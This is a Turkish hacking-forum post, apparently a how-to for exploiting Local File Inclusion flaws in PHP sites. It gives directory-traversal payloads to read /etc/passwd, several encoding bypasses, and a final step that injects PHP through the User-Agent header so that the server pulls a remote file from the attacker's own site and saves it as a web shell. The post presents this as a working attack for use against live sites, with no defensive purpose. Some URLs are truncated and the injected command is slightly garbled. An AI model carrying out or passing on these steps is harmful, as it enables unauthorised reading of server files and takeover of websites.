• Discord sunucumuz için buraya, youtube kanalımız için buraya tıklayınız.
  • Hide eklentisi aktiftir, konu açarken araç çubuğunun en sağından kullanınız. Ayrıca gizli içeriği açmak için random vs. saçma mesajlar atmayınız.

LOCAL FILE INCLUSION ACIGI ISTISMAR

R4zly

Silver Member
Silver
Elit
Katılım
23 Eki 2019
Mesajlar
191
Reaksiyon puanı
153
Puanları
43
Konum
ElitHatZ.CoM
LFİ NEDİR ?
Lfi Açığının Açlımı Local File Inclusıondur Bunun Türkçesi Yerel Dosya Okuma'dır.Eskiden Çoğu Sitede Olsada Artık Fazla Sitede Yok Ancak Hala Tamamen Kapatılmış Bir Açık Denemez.LFİ Açığından Faydalanılarak Hedef Sitenin Serverındaki Dosyaları Okunabilir.

LFİ AÇIKLI SİTE NASIL BULUNUR?
Web Vulnerability Scannerlarla Ve Manuel Olarak Bulunabilir.

LFİ AÇIĞI BULMA:
- 1) Mesela ; http://www.elithatz.com/index.php?id=9 burası sadece id değil (cat,c,home vs.) gibi de
olabilir URL’sindeki id değerini yani 9 silelim eğer şöyle bir hata ile karşılaşırsak demek ki LFİ açığı
vardır.
------------------------------------------------------------------------------------------------------------------
Hata: Warning: include(company_data/.php) [function.include]: failed to open stream: No such file or
directory in /usr/home/posting/public_html/resources/index.php on line 171
Saldırı
------------------------------------------------------------------------------------------------------------------
- Yukardaki bize verdiği hataya baktık önemli olan kısım
/usr/home/posting/public_html/resources/index.php buradır. Şimdi bakıyoruz.
1-) /usr
2-)/home
3-)/posting
4-)/public_html
5-)/resources
6-)/index.php

- Şimdi anlıyoruzki 6 adet ../ koyacağız. Yani ;
URL’ deki id değerinden sonrasını silip yerine ../../../../../../etc/passwd koyacağız.
Yani;http://www.elithatz.com/index.php?i.../../etc/passwd şeklinde.
- Peki LFİ bulunduğu halde dosya okunmazsa ne yapmamız gerekir. Tabiki Bypass.
Bypass

1- HTML Encode
Normal: ../../../../../../etc/passwd
Bypass: ..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd Yani;
http://www.elithatz.com/index.php?i...2Fetc/passwd

2- Charcode
- Charcode de her karakterin bir sayı karşılığı vardır. Normal de tek tek yazarız ama mozillanın hacbar
eklentisinde bulunan bir program.
Normal: ../../../../../../etc/passwd
Bypass:
String.fromCharCode(46,46,47,46,46,47,46,46,47,46, 46,47,46,46,47,46,46,47,101,116,99,47,112,97,
115,115,119,100)
3- Diğer
Normal: ../../../../../../etc/passwd
Bypass: ../../../../../../etc/passwd&… invalid../../../../../../../../../../../../../../../etc/passwd&…
Saldırı
- Saldırıyı mozillanın tamper data eklentisi ile yapacağız. Tamper Datayı Açalım. Ve starta
tıklayalım.http://www.elithatz.com/index.php?i.../etc/passwd şeklinde sayfasını yenileyin.
Sonra tamper
data bir uyarı verecek Tamper Datadaki User-Agent bölümünü silin ve şunu yazın: <?
system(“cathttp://www.kendisiteniz.com/r4zly.txt? -O r4zly.php “); ?> Şeklinde Shell’i yükleyin ama txt
şeklinde. Sonra
http://www.elithatz.com/r4zly.php adresinde Shell’inizi açabilirsiniz. LFİ açığı bu kadar.
 
Üst